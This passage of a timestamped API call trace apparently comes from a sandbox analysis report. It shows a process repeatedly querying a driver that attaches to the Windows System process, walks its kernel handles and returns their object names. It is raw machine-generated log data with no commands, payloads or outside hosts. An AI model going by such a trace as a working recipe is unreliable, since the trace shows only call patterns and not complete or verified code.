KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.177] PsReleaseProcessExitSynchronization () returned 0x2 [0199.177] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.177] ObQueryNameString (in: Object=0xfffffa8002e64f20, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.177] ObfDereferenceObject (Object=0xfffffa8002e64f20) returned 0x1 [0199.177] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.177] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.177] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0199.177] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.177] PsAcquireProcessExitSynchronization () returned 0x0 [0199.177] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.177] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003903e20, HandleInformation=0x0) returned 0x0 [0199.178] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.178] PsReleaseProcessExitSynchronization () returned 0x2 [0199.178] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.178] ObQueryNameString (in: Object=0xfffffa8003903e20, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.178] ObfDereferenceObject (Object=0xfffffa8003903e20) returned 0x1 [0199.178] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.178] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.178] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0199.178] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.631] PsAcquireProcessExitSynchronization () returned 0x0 [0199.631] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.631] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e696d0, HandleInformation=0x0) returned 0x0 [0199.631] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.632] PsReleaseProcessExitSynchronization () returned 0x2 [0199.632] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.632] ObQueryNameString (in: Object=0xfffffa8002e696d0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.632] ObfDereferenceObject (Object=0xfffffa8002e696d0) returned 0x2 [0199.632] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.632] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.632] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.632] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0199.632] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.632] PsAcquireProcessExitSynchronization () returned 0x0 [0199.632] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.632] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038ebf20, HandleInformation=0x0) returned 0x0 [0199.632] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.632] PsReleaseProcessExitSynchronization () returned 0x2 [0199.633] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.633] ObQueryNameString (in: Object=0xfffffa80038ebf20, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.633] ObfDereferenceObject (Object=0xfffffa80038ebf20) returned 0x2 [0199.633] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.633] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.633] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.633] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.633] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.633] PsAcquireProcessExitSynchronization () returned 0x0 [0199.633] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.633] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e6a7d0, HandleInformation=0x0) returned 0x0 [0199.633] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.633] PsReleaseProcessExitSynchronization () returned 0x2 [0199.633] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.633] ObQueryNameString (in: Object=0xfffffa8002e6a7d0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.633] ObfDereferenceObject (Object=0xfffffa8002e6a7d0) returned 0x1 [0199.633] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.633] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.634] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.634] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.634] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.634] PsAcquireProcessExitSynchronization () returned 0x0 [0199.634] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.634] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038eb730, HandleInformation=0x0) returned 0x0 [0199.634] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.634] PsReleaseProcessExitSynchronization () returned 0x2 [0199.634] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.634] ObQueryNameString (in: Object=0xfffffa80038eb730, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.634] ObfDereferenceObject (Object=0xfffffa80038eb730) returned 0x2 [0199.634] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.634] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.634] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.635] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0199.635] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.635] PsAcquireProcessExitSynchronization () returned 0x0 [0199.635] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.635] ObReferenceObjectByHandle (in: Handle=0xffffffff80000404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e68dc0, HandleInformation=0x0) returned 0x0 [0199.635] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.635] PsReleaseProcessExitSynchronization () returned 0x2 [0199.635] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.635] ObQueryNameString (in: Object=0xfffffa8002e68dc0, ObjectNameInfo=0xfffffa80031d2044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031d2044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.635] ObfDereferenceObject (Object=0xfffffa8002e68dc0) returned 0x2 [0199.635] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.635] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.636] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.636] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0199.636] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.636] PsAcquireProcessExitSynchronization () returned 0x0 [0199.636] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.636] ObReferenceObjectByHandle (in: Handle=0xffffffff80000408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028e0a20, HandleInformation=0x0) returned 0x0 [0199.636] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.636] PsReleaseProcessExitSynchronization () returned 0x2 [0199.636] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.636] ObQueryNameString (in: Object=0xfffffa80028e0a20, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.636] ObfDereferenceObject (Object=0xfffffa80028e0a20) returned 0x1 [0199.636] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.637] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.637] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.637] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0199.637] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.637] PsAcquireProcessExitSynchronization () returned 0x0 [0199.637] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.637] ObReferenceObjectByHandle (in: Handle=0xffffffff8000040c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e664a0, HandleInformation=0x0) returned 0x0 [0199.637] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.637] PsReleaseProcessExitSynchronization () returned 0x2 [0199.637] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.637] ObQueryNameString (in: Object=0xfffffa8002e664a0, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.637] ObfDereferenceObject (Object=0xfffffa8002e664a0) returned 0x1 [0199.637] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.637] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.637] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.638] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0199.638] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.638] PsAcquireProcessExitSynchronization () returned 0x0 [0199.638] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.638] ObReferenceObjectByHandle (in: Handle=0xffffffff80000410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e68c70, HandleInformation=0x0) returned 0x0 [0199.638] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.638] PsReleaseProcessExitSynchronization () returned 0x2 [0199.638] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.638] ObQueryNameString (in: Object=0xfffffa8002e68c70, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.638] ObfDereferenceObject (Object=0xfffffa8002e68c70) returned 0x1 [0199.638] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.638] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.638] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.639] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0199.639] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.639] PsAcquireProcessExitSynchronization () returned 0x0 [0199.639] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.639] ObReferenceObjectByHandle (in: Handle=0xffffffff80000414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e653e0, HandleInformation=0x0) returned 0x0 [0199.639] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.639] PsReleaseProcessExitSynchronization () returned 0x2 [0199.639] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.639] ObQueryNameString (in: Object=0xfffffa8002e653e0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.639] ObfDereferenceObject (Object=0xfffffa8002e653e0) returned 0x2 [0199.639] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.639] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.639] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0199.640] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.640] PsAcquireProcessExitSynchronization () returned 0x0 [0199.640] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.640] ObReferenceObjectByHandle (in: Handle=0xffffffff80000418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002e68470, HandleInformation=0x0) returned 0x0 [0199.640] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.640] PsReleaseProcessExitSynchronization () returned 0x2 [0199.640] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.640] ObQueryNameString (in: Object=0xfffffa8002e68470, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.640] ObfDereferenceObject (Object=0xfffffa8002e68470) returned 0x2 [0199.640] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.640] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.640] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.641] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.641] PsAcquireProcessExitSynchronization () returned 0x0 [0199.641] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.641] ObReferenceObjectByHandle (in: Handle=0xffffffff80000420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003908dc0, HandleInformation=0x0) returned 0x0 [0199.641] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.641] PsReleaseProcessExitSynchronization () returned 0x2 [0199.641] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.641] ObQueryNameString (in: Object=0xfffffa8003908dc0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.641] ObfDereferenceObject (Object=0xfffffa8003908dc0) returned 0x1 [0199.641] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.641] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.642] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.642] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.642] PsAcquireProcessExitSynchronization () returned 0x0 [0199.642] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.642] ObReferenceObjectByHandle (in: Handle=0xffffffff80000424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028d6070, HandleInformation=0x0) returned 0x0 [0199.642] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.642] PsReleaseProcessExitSynchronization () returned 0x2 [0199.642] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.642] ObQueryNameString (in: Object=0xfffffa80028d6070, ObjectNameInfo=0xfffffa8003163044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003163044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.642] ObfDereferenceObject (Object=0xfffffa80028d6070) returned 0x2 [0199.642] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.642] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.643] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0199.643] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.643] PsAcquireProcessExitSynchronization () returned 0x0 [0199.643] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.643] ObReferenceObjectByHandle (in: Handle=0xffffffff80000430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f85860, HandleInformation=0x0) returned 0x0 [0199.643] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.643] PsReleaseProcessExitSynchronization () returned 0x2 [0199.643] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.643] ObQueryNameString (in: Object=0xfffffa8001f85860, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.643] ObfDereferenceObject (Object=0xfffffa8001f85860) returned 0x2 [0199.643] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.644] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.644] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.644] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.644] PsAcquireProcessExitSynchronization () returned 0x0 [0199.644] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.644] ObReferenceObjectByHandle (in: Handle=0xffffffff800004a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003773500, HandleInformation=0x0) returned 0x0 [0199.644] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.644] PsReleaseProcessExitSynchronization () returned 0x2 [0199.644] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0199.644] ObQueryNameString (in: Object=0xfffffa8003773500, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.644] ObfDereferenceObject (Object=0xfffffa8003773500) returned 0x1 [0199.644] 